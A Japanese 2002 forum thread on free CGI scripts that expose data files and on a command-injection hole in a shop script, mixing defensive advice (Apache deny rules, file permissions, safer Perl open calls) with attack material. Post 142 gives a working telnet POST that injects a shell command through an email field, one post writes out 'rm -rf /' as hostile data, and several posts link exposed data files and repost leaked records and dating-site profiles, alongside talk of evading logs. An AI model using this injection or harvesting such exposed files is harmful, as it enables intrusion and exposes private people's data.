【CGI作者へ】データ流失の助長はやめて【おながい】

このエントリーをはてなブックマークに追加
1山芳社員
ググルでアンケートのcgiを検索して、引っかかったものに、
デフォルトのデータファイル(***.dat)などを調べてみると、
50%くらいの確率で名前を変えておらずパーミッション設定もしてない。

フリーのCGIを使う人のレベルなんてたかが知れているから、CGI作成
の時に、データファイルの拡張子をplかcgiにしておくべきでしょう。
なぜ、殆んどのCGIはデータをtxtとかcsvとかdatにして配布するんですか?
お蔭でうちの会社は今大変です。
2山芳社員:02/07/01 12:09
ついでに自分で2ゲット
>>1
ハゲシク腹違い
http://pc.2ch.net/php/
4山芳社員:02/07/01 12:29
すみませんでした。
向こうへ逝って来ます。
5山芳社員:02/07/01 12:33
お詫びのしるしに、お土産をおいておきます。
あなたも、もしかしたら被害者かも。
http://www.colors.ne.jp/~hhh/fvote/fvote.cgi

(このスレは削除依頼しときます)
おまえの設定が悪いんだよ。
お前CGIをなめてんだろ。
なめんのはいいよ。
でもな、これだけは覚えとけ。
データ流出はお前の所為だ。
皆さんは、データ管理がしっかり出来る大人になりましょう。
7名無しさん@お腹いっぱい。:02/07/01 18:07
データファイルの名前を変えるなんて事は小手先の
解決策。HTTPサーバのほうで、拡張子.dat, .csvなどを
ダウンロードできないようにするのが本筋。
8名無しさん@お腹いっぱい。:02/07/01 18:17
拡張子.dat, .csvなどをダウンロードできないようにするなんてのは、
小手先の回避策。解決策じゃない。
httpd の公開ディレクトリの外に置け。アホばっかやな。
9名無しさん@お腹いっぱい。:02/07/01 21:53
>>8が最も正しい。
補足するとhttpd の公開ディレクトリの外というのは別マシンも含むぞ。
同意だが、個人がプロバイダに設置する場合は
大抵ドキュメントルート外にファイル置けないでそ
普通はホームディレクトリ(public_htmlの上)はアクセス可能だろ。
じゃなかったらメルで飛ばす、出来ないようだったらそんな所使うな。
>>1見落としてたが、データファイルの拡張子をcgiにしろなんてひろめたヘボは誰だぁ。
>>11 まぁ、そうだけど…

↓こんな対処方法もある

<FilesMatch "\.(csv|dat)$">
deny from all
</FilesMatch>
14名無しさん@お腹いっぱい。:02/07/02 04:13
そして、鯖をアップグレードした拍子に、
AllowOverride がデフォルトの none に戻って、
>>13 の設定が無効になるという罠くらい知っとけよ、糞鯖貸屋。
>>12
データファイルの拡張子をcgiにするなんてトンでもないこと。
一件目、二件目の登録者が、こんな登録をしたらどうする?

#!/bin/csh
rm -rf /
>>15
データの一行目に

#!/usr/bin/env perl

というダミーの行を入れておくとよいです。
>>14(゚Д゚)ハァ?
データファイルや、そのディレクトリを httpd には読ず、
CGI には読めるパーミッションにしておくのはどうよ?

小手先には違いないけど…
>>15-16
その「データファイル」のパーミッションはいくつだい
拡張子を scr にしとくてのはどうよ
>>19
700
ふつー600にするわな。
>>18
CGIが所有者の権限で動いてたら600にするといい
otherで動いてたら606か666にしないと動かないから丸見え
元のCGIは名前、メアド、コメントは公開される仕様でデータが見えてもよかった
山芳のは見えるとまずい個人情報を扱うように改造したのがまずかった

見 え る と ま ず い デ ー タ は Web の ネ ー ム ス ペ ー ス に 置 く な
楽しみが減ってしまいます。
26名無しさん@お腹いっぱい。:02/07/02 13:33
> 大抵ドキュメントルート外にファイル置けないでそ

こういう糞鯖貸屋が問題の癌。

公開ディレクトリの外にファイルを置けない鯖貸屋のブラックリストがほすい。

おまいら、作ってください。
バガボンドでもいいです。おながいします。
共 有 鯖 に は 機 密 デ ー タ 置 く な
客がhttp://..... と打ってCSVを見たがるんだからdocument root以下にデータ置くなじゃねえ。
http://hoge:hoge@.... ぐらいにしとけばこの板の住民をよけるには十分では?
29名無しさん@お腹いっぱい。:02/07/02 14:54
>>28
設定ミスりやすくて危険
フェールセーフ発想のない鯖屋は氏ね
>>28データ流出の危険性を書いて責任は客にあると覚書交わしとけば桶。
これでも見たがる客は氏ね。
>>30
それじゃ借り手がいなくなる Yo
じゃあ、これからは、流出事故が起きたら、鯖屋も晒すってことで、FA?
そんなに難しいのか、その設定は。
34名無しさん@お腹いっぱい。:02/07/02 19:32
暇ならここにおいでよ
http://www.am.wakwak.com/~wild/cgi-bin/eb/ebs.cgi
エンドレスバトル
無料ネットゲーム
敷居は低いが駆け引き最高


何故、高い金を払ってサーバを借りてまで
パーミッション設定などという、しみったれたことをせねばならぬのか。
みんな鯖屋鯖屋っていうけど、
吹けば飛ぶようなチンケなWeb屋に出入りしてる
できそこないのドロップアウトのPGが責任者だからね。

リスク避けたいんだったら客がそれなりの金を積めばいい
というだけの話。

設定がどうとか言う問題じゃない。
37h076.p957.iij4u.or.jp:02/07/02 20:43
>>36
それを逝ってはお終いだべさぁ
CGIプログラミングは、動くだけの物なら特別な技術持って無くてもでっち上げられるんで、
ふきだまっている最下層のPGにあたる確率高し。
さらにヘボが解説書いてヘボを養成するヘボヘボスパイラルが形成されてるから、晒すネタ
が枯渇する事は当分無いだろう。
まあ色々出てるレスはそうなんだが、色々手を尽くして流出の可能性を潰して行くのは重要だろう。
その意味では>>1の提案は悪くない。

本当にセキュアにするんなら、住所まで入った個人情報をThe internetからダイレクトに入れる
サーバなんぞに吐き出さない事だな。しかもプレーンテキストで。
>>39 >>15読んだの? 意味を理解せずエラーにするのは愚の骨頂。
>>40
類推できないような名前にして、さらに拡張子をplにすればyo。
万が一の場合だから、滅多なことでサバーエラーは発生しないだろ。

その万が一の時に、データがみえるdatなどだった場合は、
データの回収なんかできない。
保険みたいなもんだ。
だからなんでデータファイルに実行権与えてんだよ
>>15みたいな状況をを本気で考えてるならアフォとしか言いようが無い
>>44
は?
つーかおまいらWebprog板でやれ
>>42
データの最初と最後の部分を、エラーを起こさない短いプログラムにしとけばいいじゃん。
4847:02/07/03 08:33

そして、各データ行の先頭には # を埋め込むようにする。
>>44
アフォでも事故を起こさせないためにどうするかって話だろ。
だから、アフォな事態が起きるような回避策ではダメってこと。
http://pc.2ch.net/test/read.cgi/sec/1025028471/928という話もあるんで
信じては逝けないCGI入門書の一覧でも作るか。
漏れは一冊も持ってないんで任せたぞ。 > >>51-
51名無しさん@お腹いっぱい。:02/07/04 13:50
666 に設定した結果ファイルを DocumentRoot 以下に置くのと、
*.cgi なんて名前のファイルが CGI から書き込み可になるのとどっちが危険だ、
と言われたら、生理的には後者の方がずっといやだぞ。
DocumentRoot に置いて見えちまうアホはそいつ限りの被害だが、
フールプルーフとしては、万が一の被害は後者の方が重大だと思う。
たとえば間違えて 777 にしちゃうとか。
52今更だが:02/07/04 14:12
>>6
微妙にワラタ
54名無しさん@お腹いっぱい。:02/07/05 23:51
55名無しさん@お腹いっぱい。:02/07/06 00:08
http://www2q.biglobe.ne.jp/~terra/cgi/checktest.htm
■お知らせとお願い
このコーナーに有るスクリプトは、必ずフリーウェアとして公開します。
人気が有るからと言って、シェアウェアにする事は決してありません。
突っ込みどころ満載だな。じっくり見てみる。
57名無しさん@お腹いっぱい。:02/07/06 00:10
よくもまあ実メアドをホイホイ入力できるものだ。
性欲とは自分を見失わせるのか。恐ろしいや。
中には会社や大学のメアドが散見されるのが痛々しい。
60名無しさん@お腹いっぱい。:02/07/07 04:42
良く考えたら、デフォルトのファイル名のまま使っていたり、
カレントディレクトリの下に書き込んだりするように設定していたら、
そもそも動かないようにエラーチェックコードを書けばいいんだよな。
まあ、DocumentRoot 内にあるかどうかの判断は難しいと思うが、
カレントディレクトリの下かどうかくらいは判断がつくだろう。
カレントディレクトリの下にしか置けないのならば、
そんなプロバイダで使うなよ、ってメッセージを表示するのもありだと思うし。
今回の出会い系のメアド流出に関する責任は、こんな感じだろう。

CGI作者(terra) 20% ---データファイルを、最低限別名にしたり別ディレクトリに置く必要性を明記しなかった)
設置者      50% ---重要な個人情報を扱うという意識に欠けていた。(安っぽいCGIに手を出し、データ管理もダメダメ)
利用者      30% ---そのようなずさんな場所に、本メアドをいともたやすく入力する危機意識の無さ。
 
62名無しさん@お腹いっぱい。:02/07/07 09:59
http://www2q.biglobe.ne.jp/~terra/cgi/download.htm

「当サイトのスクリプトを利用した事によるいかなる損害も私は一切の責任を負いません。」
63名無しさん@お腹いっぱい。:02/07/07 10:14
>>61
> 利用者      30% ---そのようなずさんな場所に、本メアドをいともたやすく入力する危機意識の無さ。

利用者は、他の利用者に対しては責任はない。流出に関する責任としては、設置者100%だよ。
ただ、流出による被害については、利用者個々人にも責任はある。
http://www2q.biglobe.ne.jp/~terra/cgi/download.htm
>◆ダウンロード
>メール転送サービス、メールアドレス変換サービスをご利用のメールアドレスには送信できません。
>実際に存在しないメールサーバには転送しない設定になっています。
>また、ポストペットなどのお遊びメーラーでも受信できない場合が有ります。

フリーのメアドだとダウソできなかった
しかもホームページのアドレスも記入するようになっている
考えすぎかもしれないが、作者がCGI設置先のアドレスを知っていれば
個人情報の収集はいとも簡単
65名無しさん@お腹いっぱい。:02/07/07 11:28
>>64
というか、terra は糞スクリプトの利用者の連絡先を全部知っているわけだから、
今回の事件を知らせて対策するようにメールで連絡を取るのが開発者としての責任
ではないか?
66名無しさん@お腹いっぱい。:02/07/07 11:34
>>65
いや、例えばhttp://tryhp.dip.jp/order/から入ればwebshoplightは落とせるよ
書籍にも添付してるようだし、全員は把握してないだろう。
こりゃjpcert,ipaに報告かな。
>>64が書いてるページから誰がどのCGIをいつダウンロードしたかのリストが漏れてた。
ダウンロードした人のURLつきだから、このリストからさらに漏れ情報を
拾うこともできる。どうしよう。2357行あります。
>>67 もう拾えない??
わからん。ダウンロードした人達に連絡よろしこ >67
7067:02/07/07 14:24
よく見てみたら、あそこに設置してあるフォームから書き込まれたデータじゃ
ないっぽいなぁ。別の場所にもダウンロードフォームが設置してあるのかな?

ダウンロード種別ごと漏れ件数(w
857 WebShopお試し版
364 フリーマーケットお試し版
277 ハッピーバースデーお試し版
271 ハウジングサーチお試し版
252 ベストフレンドお試し版
193 ジュピターお試し版
142 レスポンスお試し版

>>68
まだ置いてあるよ。
7167= eAc1Adb240.tky.mesh.ad.jp:02/07/07 14:48
漏れた人たちに俺から連絡するのもアレだし、
作者にこっそり連絡するのはもっとアレなので、
サポート掲示板にタレコミしてきました。
terraはmember.datに対し第666プロテクトを掛けた
73名無しさん@お腹いっぱい。:02/07/08 13:17
terra, IPA, jpcertにWebShopLightの任意コマンド実行デモを送りました。

ttp://www.digicame.cc/gallery/i/i.cgi
■あなたのお名前の表示なしに作品やコメントの投稿できます
■ちょっとだけ本音の感想が聞けるかも…(恐い?聞きたい?)
ttp://www.digicame.cc/gallery/i/upppu.txt
ttp://www.digicame.cc/gallery/i/upppu.cnt
75名無しさん@お腹いっぱい。:02/07/08 13:56
あぅ terraのWebShopLightの対処法間違ってたわ。
if (!open(MAIL,"| $sendmail '$mailto'")) { return(1); }
7667:02/07/08 18:12
あれ、カキコ失敗しちゃった。二重レスになってたらスマソ。

えと、お試し版だけではなく、有料版をダウンロードしたリストも漏れてました。
260件25KB。中身はこんな感じ。

166,976500913,WebShop,WS0078,武田有司,[email protected],http://www3.inforyoma.or.jp/terra2,一般
150,973234323,かんたんレシピ,RP0094,武田有司,[email protected],http://www3.inforyoma.or.jp/terra2/,一般
149,973234323,ハッピーバースデー,BS0143,武田有司,[email protected],http://www3.inforyoma.or.jp/terra2/,一般
JPCERTから返事来ますた。terra様はまだ配布しとるですね。
次は阻止無に回収しろゴルァかな。
7867:02/07/08 23:37
もろ見えスレの方でURLがバレてしまいましたわ。出さないでおいたのに。

>>77
乙彼。
webshoplightにかぎらず、こいつのいろんなCGIで同じように
汚染チェックをサボってる可能性が高いね。XSSぐらいはボロボロ出てきそう。
「パーミッションて何は」何度読んでも藁える。
http://www2q.biglobe.ne.jp/~terra/cgi/Permission.htm
8077:02/07/09 00:30
>>67 sendmail叩いてるのは全滅だろうね。

>>79 特に↓
> オーナーをはじめ、すべての訪問者に読み込み、書き込み、実行を許可「rwx = 7」するのは、セキュリティー上
> 多少問題が有る事は事実ですが、ディレクトリ事態が動作する訳ではなく、CGIが操作しているのですから
> CGIに問題が無ければそれほど心配する必要はありません。
ディレクトリとファイルではxビットの意味が違う事も知らないようだ。

http://www2q.biglobe.ne.jp/~terra/cgi/cgitext.htm
> CGIは命取り
> といってもあなたの命を盗る訳ではありませんが、前述のとおり、CGIは、あなたのパソコンではなく、
> サーバで実行されます。十分バグ取り(エラー削除)されていないスクリプトを実行したり、
> あいまいな知識で作成したスクリプトを実行させるとサーバがハングアップ(暴走)することもありえます。
> あなたは、あなたの加入しているプロバイダの数万、数十万の会員に迷惑をかけることになるのです。責任が取れますか?。
大丈夫です。「いかなる損害も私は一切の責任を負いません。」と書いておきますから。 (w
>>80
> あなたは、あなたの加入しているプロバイダの数万、数十万の会員に迷惑をかけることになるのです。責任が取れますか?。
terra様は予言者?
82愛と死の名無しさん:02/07/09 01:48
否、「ノッツェ」に救われたかと・・・。
今回の件について、terra タンの反応って何かあった?
表向きには全く沈黙?

せっかくだから、イイ感じの逆ギレきぼん>terra タン
8477:02/07/09 02:09
jpcertとIPAとterra神には同報で出しといた。
jpcertからも同報で返信されて来た。これでメル受け取ってないとは言わせん。 (w
8577:02/07/09 10:52
ソシムにメルしました。
----------------------------
前略

貴社より発売中の「すぐはじめる CGIでWebショップ」に外部から任意コマンド実行可能な
深刻なセキュリティーホールを発見しました。
筆者様,IPA殿,JPCERT殿には以下を送付済みです。
このセキュリティホールはCGIの設置者のみならず、サーバ全体に影響を及ぼすので、早急に
筆者様と連絡をとり、書籍の回収、または購入者への告知等必要な処理をとられることを期待
いたします。
調査したのはwebshoplightだけですが、他のsendmailを利用しているスクリプトにも同様の
セキュリティホールが存在しているものと思われます。

なお、下記のメールの攻撃例、緊急対応法は間違っております。
正しいものは筆者様に送付してあります。
<元メールカット>
terra様と、[email protected]に送りますた。
---------------------------------------
前略
貴サイトにて配布中のterra様作wepshoplightに外部から任意コマンド実行可能な深刻な
セキュリティーホールを発見しました。
作者様,IPA殿,JPCERT殿には以下を送付済みです。
このセキュリティホールはCGIの設置者のみならず、サーバ全体に影響を及ぼすので、早急に
作者様に連絡をとり、ダウンロードを停止されることを期待いたします。
調査したのはwebshoplightだけですが、他のsendmailを利用しているスクリプトにも同様の
セキュリティホールが存在しているものと思われます。

なお、下記のメールの攻撃例、緊急対応法は間違っております。
正しいものは筆者様に送付してあります。

追伸:
貴サイトにて配布中のスクリプトはコピーライト表示が貴サイトのものに変えられています、
著作者人格権は移転てきないはずですが、作者様は承諾しているのでしょうか?
<元メールカット>
よくよく見ればWebShopLightの問題のメール送信部分とほぼ同じものが
ttp://www2q.biglobe.ne.jp/~terra/cgi/henteko3.htm
ttp://www2q.biglobe.ne.jp/~terra/cgi/sendemail.pl
に晒されてた。terra以外の人間がこれをパクって穴つきCGIを作ってる可能性が…。
良く見なくても予想できたけど最悪だね。
<form>と<input type=text name=email>で引っ掛けりゃいいのかな? 396の検索能力が欲しいところだ (w
>>79
まぁ、世の中にはディレクトリを777、データを666にしないとうごかない
サーバはゴマンとあるから、あれでもいいだろ。有料レンタルサーバでも
sueEXECを入れていないやつはまだある。

ところで、穴付きCGIをそんな簡単に指摘しちゃだめよ。
やっぱ、実際に被害者がでるまでほったらかした方があとあとおもしろいよ。
それに、mailの穴は超有名なというかCGIの基本だから、そんなのいちいち
報告してもべつに有名ハッカーになれるわけでもないし・・・。
正直なところ、そんな超基本的なバグを一生懸命得意げに報告している姿には
むなしさを感じるな。

あ、わかってると思うけどプログラムのバグにつけ込んでアタックするのは
不正アクセスになるよ。CGIの穴を検証するときはかならず自分のマシンに
ローカルなサーバを立ててやるように。
terraのサイトとかほかのweb通販サイトで実験して一生を棒にふらないように。
>>85
>>86
必死だな。
ビジネス文書としては0点。敬語の使い方わかってないな。
9177:02/07/09 13:53
fanta-g.netさんから配布停止するという連絡が来ますた。

>>89
無論ローカル鯖でやっただよ。
外部鯖でも通常の注文にしか見えないログしか残らんけどな。

>>90
ったりめーだろ。これを俺が使ってる鯖に設置されたらこっちも被害者だ。
ついでに騒ぎにしてヘボCGI作者を叩いて警鐘にするというのはある。
敬語の使い方がわかってないのは素直に認めよう。後学のために添削してくれ。
>>91
>無論ローカル鯖でやっただよ。
>外部鯖でも通常の注文にしか見えないログしか残らんけどな。

あの、実行したシェルコマンドはすべてシスログに残るんですが。
それから、そのCGIの穴を突いてApacheがError 500を返してしまうと
エラーログにも残るんですが。しかも、エラーログってそんなに出ないから
すぐばれるんですが。
>>92 おいおい(藁

>あの、実行したシェルコマンドはすべてシスログに残るんですが。
残らないし。

>それから、そのCGIの穴を突いてApacheがError 500を返してしまうと
返さないし。
>>89
> それに、mailの穴は超有名なというかCGIの基本だから、そんなのいちいち
> 報告してもべつに有名ハッカーになれるわけでもないし・・・。

悦に入って報告するわけじゃないだろ? おまえはそうなのかもしれんが(プ
>>85-94
♪けんかをやめて〜 ふたりをとめて〜
  わたしの〜ために〜 あらそ〜わ〜ないで〜

                         by terra
今後の展開に期待
ttp://www2.inforyoma.or.jp/~terra/support/support.cgi?view=41837

個人情報漏れ あのに さん 7/9(火) 12:23
[x1.randmax.jp] Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.0.3705)

> すごい重大な事件のはずなのにまる一日たっても流出を止めてない
> ようですね。それだけの技術がないのか止める意志がないのか

自分の所のすらまだ止めてないですからねー・・・
正直あいた口がふさがりません。

ここでURLを晒さないとだめなののでしょうか?
9777:02/07/09 21:50
>>92
スマソ、エラーログには残らないけどメルとaccountに痕跡残るわ。
でも全部perlでやれば何をやったのかはばれない。 (w

> しかも、エラーログってそんなに出ないからすぐばれるんですが。
データファイルを.cgiにして妨害してくれている罠。 (w
ttp://www2q.biglobe.ne.jp/~terra/cgi/webexplorer/webexplorer.cgi
↑これってどこからダウンロードできるの? セキュリティホール満載の予感。
てゆーか、こういうCGIの存在自体が穴。

ttp://www2q.biglobe.ne.jp/~terra/cgi/webexplorer/webexplorer.cgi?action=opendir&dir=/&pw=abc123
なぜか dead.letter が(藁

そして 23425.tmp
9998:02/07/10 13:00
おや、User-Agentで挙動を変えてるのかな?
Mozillaだと dead.letter は見えない。w3m だと見える。
う〜む…なんというか…アホだな、こいつ。
基礎知識の大切がよくわかりました。
半端な知識が一番まずいという事がよくわかりました。
なんでもそーだな。

action=unlink (藁
if (!open(MAIL,"| $sendmail '$mailto'")) { return(1); }

これは何故ダメなのかが分からないダメな漏れ
(''で囲めば文字列認識じゃなかったっけ...自信なし)

これならいい?↓ダメ?
open(MAIL, "| $nkf -j | $sendmail -f$returnadd -t");
print (MAIL "To: $in{'mail'}\r\n");
× if (!open(MAIL,"| $sendmail $mailto")) { return(1); }
○ if (!open(MAIL,"| $sendmail '$mailto'")) { return(1); }
terra様が配ってるのは前者
107105:02/07/11 15:09
>>106
そうでしたか.
...terra様ったら...これで印税かせいでたと思うとイヤーな気分
>>106
$mailto に「'」が含まれてたらどーなる?
>>108
なるほど、
foreach $ml (@TO, @CC, @BCC) {
if ($ml =~ /([#-9A-~\-\_]+\@[#-9A-~\-\_\.]+)/) {
if ($i == 1) { $mailto = "$1"; }
else { $mailto .= "\,$1"; }
}
$i++;
}
駄目だね。

対応法: webshoplightを削除する。
ttp://www2q.biglobe.ne.jp/~terra/cgi/mailme/member.cgi?sex=0

大山 さん 2002年5月1日(水) 20時9分

重複チェック機能の確認結果。 ・・・そういう機能は組み込まれてないと判明。
氏名もメールアドレスも登録者のモラルに頼る方式ですね。 同一者の多重登
録や、なりすましもあり得る訳ですね。。。

北海道  1月1日生れ やぎ座
$mailto =~ s/[^[email protected]]//gi;
↑こうればいいのかな?
読んでないのかシカトしているのか判らないけど、明日でメルうって一週間なので、サポートBBSで告知しよう。
実証コードはお盆明け予定。
読んでてシカトなんじゃないかな。あのサポートBSSに毎日出てくるヤシ、
実は他人のふりして本人ってことはないかな?
ttp://www2.inforyoma.or.jp/~terra/cgi/download.dat

まだみれる
神terraは何にもわかってないだろ。
117名無しさん@お腹いっぱい。:02/07/12 23:37
terraタン3つのウソ

@
>「説明などしなくてもファイル名は変更していただける」と思いこんでいた
>ところが有ります。

自分ですらファイル名変更してないのに?(w

A
> 問題の多いものは削除するようにしているのですが、これも追いついていません。

消すくらい簡単だろうになあ。

B
>「フリーで公開しているのだから」という安易な気持ちがあったのかもしれません。

商売もしてた様ですが。。。

まあ、とにかく、まずはダウンロードしたユーザに告知することですね。
そのために連絡先集めたんだろうし。
誰か、~terra様にここを教える気はないのですか?(キャッキャッ
嘘を嘘と見抜ける人でないと、
terra作のプログラムを使うのは難しい。
>>120
なるほど、ちょっと賢くなった。
ttp://www2q.biglobe.ne.jp/~terra/cgi/index.htm
お探しのページが見つかりませんでした。

ttp://www2.inforyoma.or.jp/~terra/
Forbidden
You don't have permission to access /~terra/ on this server.
逃亡したもよう。
あちゃ〜。ある意味最悪だぁね。自分の作ったのの責任取らないで、ケツまくって
逃げるっつ〜のは…
飲むか飲まないかは客の自由な「やせる薬」
配りまくったあげく逃げ出す贋医者ってか?感じ悪すぎ
>>120
open(FOO, "|-") || exec ...
の意味、しばらく悩んじまったけど、forkに失敗した時に想定外の動作になるので糞コード。
使い捨てスクリプトでならやるかも。
ttp://www3.inforyoma.or.jp/sion/cgi-bin/bbs/windowbbs.cgi
ttp://www3.inforyoma.or.jp/sion/cgi-bin/bbs/powernote.cgi
すべての内容は日本の著作権法並びに国際条約により保護されています。
Copyright 2000 Terra. All rights reserved. No reproduction or republication without written

ttp://www3.inforyoma.or.jp/terra2/
ttp://www3.inforyoma.or.jp/terra2/cgi-bin/windowbbs/windowbbs.cgi
ttp://www3.inforyoma.or.jp/terra2/cgi-bin/bbs/powernote.cgi
当サイトに掲載の記事、写真の無断転載を禁じます。すべての内容は日本の著作権法並びに
国際条約により保護されています。(リンク、広告掲載については「その他のサービス」ページへ)
Copyright 2000 Terra. All rights reserved. No reproduction or republication without written

ttp://www3.inforyoma.or.jp/terra2/public_html/otoiawase.htm
Navi 高知について、ご意見ご希望などありましたらお願いします。
お問い合わせなどは、下記お問い合わせフォームでお願いします。

ttp://www.socym.co.jp/pages/books_annai/pc_inet_1.html
Webスクリプトの最高峰!
Try The HomePage最新プレミアムCGI集
すぐはじめる CGIでWebショップ
お詫び
今回、当サイトのセキュリティの甘さからご利用いただいた一部の方々の個人情報(E-Mail)
が流出してしまった可能性が有る事が判明しました。
また、この事をいち速くお知らせいただいたにもかかわらず、対応が遅れてしまった事も
管理者である私の責任です。
メディアでも報道されているように、いろんなところで「個人情報の流出」が問題にされて
いる中、CGIを紹介しているサイトとしては弁解の余地も有りません。

この場をお借りして深くお詫びいたします。


いろいろと考えさせていただきましたが、今回はセキュリティの問題を解決する事が先決
と考え、一度サイトを閉鎖させていただき、私どもの意識改革を含め二度とこのような事
の無いよう出直したいと思います。

長い間ご利用いただきありがとうございました。
当サイトがご紹介したスクリプトが少しでもお役に立てた方がいらっしゃれば幸いです。

引き続き、書籍で紹介したスクリプトの修正版や、有料でご利用いただいているスクリプ
トのサポートは行っていきます。
もう少しお時間をください。

 今回のことをお教えいただいた方々を始め、サイトの運営にご協力いただいた多くの
方々にお礼申し上げます。またお会いできる日が来る事を願っています。
>>129
> No reproduction or republication without written

No reproduction or republication without written permission

のことかな。どこかからコピペしてミスった思われ(w
134126:02/07/13 18:18
正しくは

my $pid = open(FOO, "|-");
die $! unless (defined($pid));
unless ($pid) {
exec ... || die $!;
}
やね。
>>131
> 私どもの意識改革を含め二度とこのような事の無いよう出直したいと思います。
私どもってなんだろね? terraって複数人で構成されてた?
>>135

どこの国の方ですか?


ども【共】(接尾)
(1)名詞に付いて、そのものが二つ以上であることを表す。
 「者―進め」「犬―」「こまごましたこと―」
(2)一人称の代名詞に付いて、謙譲の意を添える。
 「わたくし―の手違いでした」「てまえ―の店では扱っておりません」
(3)人を表す名詞に付いて、相手への呼び掛けに用いる。
>>136
勉強になりますた
138              :02/07/17 00:00
あげてみる
139名無しさん@お腹いっぱい。:02/07/17 02:48
■危険■PCから個人情報を盗むデートクラブ■危険■

悪質な出会い系クラブを発見したので日本全国に告発します。
■■■ Club-Cosmo ■■■
コスモライフとホテルニューオータニが提案する新しいライフスタイル
http://www.trust-system.co.jp/club-cosmo/index.htm

以下のソフトはスパイウエアです。この出会い系クラブの目的は
PCに記録されている会員の個人的な嗜好を勝手に抜き取って、別
の商売に転用することである疑いが濃厚です。

a)会員専用のコミュニケーションソフトウェア
http://www.trust-system.co.jp/club-cosmo/download_files/cosmo_viewer.exe

b)USBキー認証ツール
http://www.trust-system.co.jp/club-cosmo/download_files/RainbowSSD5.39.2.exe


これらのプログラムを開発したのはトラストシステムという企業です。
地図の模型を作っているようですが、実績を見ると何でも屋のようです。
http://www.trust-system.co.jp/
この企業の求人案内
http://www.trust-system.co.jp/recruite.htm
問い合わせ
http://www.trust-system.co.jp/toiawase.htm

ソフトを解析すれば私の告発が的を得ていることが証明できるでしょう。
http://www.asagao.sakura.ne.jp/~ksm/strange/bbs.cgi
このサイトがまるみえ。
宣伝ぢゃないよ、パーミッションの設定ミス。
↑ブラクラチェッカのリファばっか(wo-nまんだむ;
http://www.asagao.sakura.ne.jp/~ksm/strange/bbs.txt
142名無しさん@お腹いっぱい。:02/08/18 10:42
お盆休みも終わりなので確認コード。 対応法は>>134

% telnet xx.xx.xx.xx 80
Trying xx.xx.xx.xx...
Connected to xx.xx.xx.xx.
Escape character is '^]'.
POST /WebShopLight/webshoplight.cgi HTTP/1.0
Attack-Command: eval sh -c "ls -l >test"
Content-Length: 238

[email protected]$($HTTP_ATTACK_COMMAND)&tel=0000-0000-0000&fax=&ubin=100-0001&jyusyo=%3F%3F%3F&settle=%91%E3%8B%E0%88%F8%8A%B7%97X%95%D6%96%94%82%C
D%91%EE%94z%95%D6&comment=%81@&button=%8Am%94F+OK+%92%8D%95%B6%82%B7%82%E9
143名無しさん@お腹いっぱい。:02/08/18 10:55
144707:02/08/19 12:45
145707:02/08/19 12:49
yahooとかでWS_FTP.LOGで調べてみて。いっぱいだ
146名無しさん@お腹いっぱい。:02/08/19 23:11
>>707
セキュ穴さんがいるんじゃねーのか。
Server: Apache/1.3.20
148名無しさん@お腹いっぱい。:02/08/19 23:51
うんこぷりぷり〜
149146:02/08/20 00:25
>>147
ワラタ。
150名無しさん@お腹いっぱい。:02/08/20 19:45
>>146
この人の鯖、穴あるよ。
アプグレしたほうがええよ。
CERT勧告確認しようね。
151名無しさん@お腹いっぱい。:02/10/07 06:42
意味無くアゲ
>>151 あげ荒らし氏ね
153名無しさん@お腹いっぱい。:02/10/07 18:55
156後はお好きなように:02/10/09 00:30
157名無しさん@お腹いっぱい。:02/10/09 04:17
>>134
元のMLではがいしゅつだけどね。
http://memo.st.ryukoku.ac.jp/archive/200206.month/4258.html
見た目の短さでわざわざ糞コードに改悪してくださる宮川様には
開いた口がふさがりませぬ。
そういう発想こそがセキュリティホールの元だというに。
会社からご苦労様です
ttp://may.sakura.ne.jp/~musume8/mailme/member.cgi?sex=0
 身長170体重80でがっちりタイプです。仕事柄出張がおおいので地方の方でも気軽に返
 事下さい。お互いの生活を脅かすことなく、ある意味割り切ってお付き合いできる方を
 希望します。年齢は20〜40ぐらいまででお願いします。交際費は全て負担しますので気
 軽に返事下さい。
     既婚者で家庭は壊したくないけどちょっとドキドキしたいと
         愛人になってくれる若くて素敵な方を探しています!
ttp://www.suisen.sakura.ne.jp/~penweb/Hindex/mailme/member.cgi?sex=0
 僕はお金持ちじゃないけどきっとこの掲示板に載せてる中では顔とお洒落は上位に食い
 込めると思います。Hは他の人のを知らないので何とも言えませんが、舌技が得意でそ
 れだけでイカせる自信はあります。そんな僕とお会いできる女性を募集してます。よろ
 しくね!
      Mっ気のある女の子をよろこばせてあげたいな。
ttp://www.kensaku-net.com/deai/merutomo/hiroba/tyu/member.cgi?sex=0
 彼女います。旦那や彼氏には話せないちょこ話しましょう。仕事柄日中でも、返事返せ
 ます。
terraってもう完全にCGIの配布中止してるの?
Webprotect.cgiが欲しいんだけど…誰か持ってる?
163名無しさん@お腹いっぱい。:03/01/13 14:11
164山崎渉:03/01/15 15:41
(^^)
165山崎渉:03/03/13 17:32
(^^)
166名無しさん@お腹いっぱい。:03/04/14 21:26
あげ
167名無しさん@お腹いっぱい。:03/04/14 21:32
>>166 なぜ?馬鹿?
168名無しさん@お腹いっぱい。:03/04/15 11:21
    γ⌒⌒ヽ
  ヾ) ノノノノノハ)
   ヽノソ ‘ 。‘ノ  <もろ見えだわ〜
    丶_●‐●
      〉  , l〉
     (~~▼~|)
      > ) ノ
     (_/ヽ_)

http://www.media-0.com/www/dvd01/index1.htm
169山崎渉:03/04/17 12:04
(^^)
170山崎渉:03/04/20 06:21
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
171名無しさん@お腹いっぱい。:03/04/30 03:16
uppp
172名無しさん@お腹いっぱい。:03/05/18 00:31
気になることあり。

そういえば、エクスプローラーではCGI中のdatは落とせないよね。
他に落とせる方法ってあったっけ?
自分の設置したCGIのデータ落としたいけど、
自分のホームページのアップロードのパス忘れちゃいました…
173名無しさん@お腹いっぱい。:03/05/18 04:14
>>172
言ってる意味わかんね
174名無しさん@お腹いっぱい。:03/05/18 04:19
175オナニスト ◆A4R0lAe0RQ :03/05/19 11:43
>>172
(゜Д゜) ハア??
初心者ですか?
釣りですか?
以後放置で
176山崎渉:03/05/22 02:01
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
177山崎渉:03/05/28 17:14
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
178山崎 渉:03/07/15 11:15

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
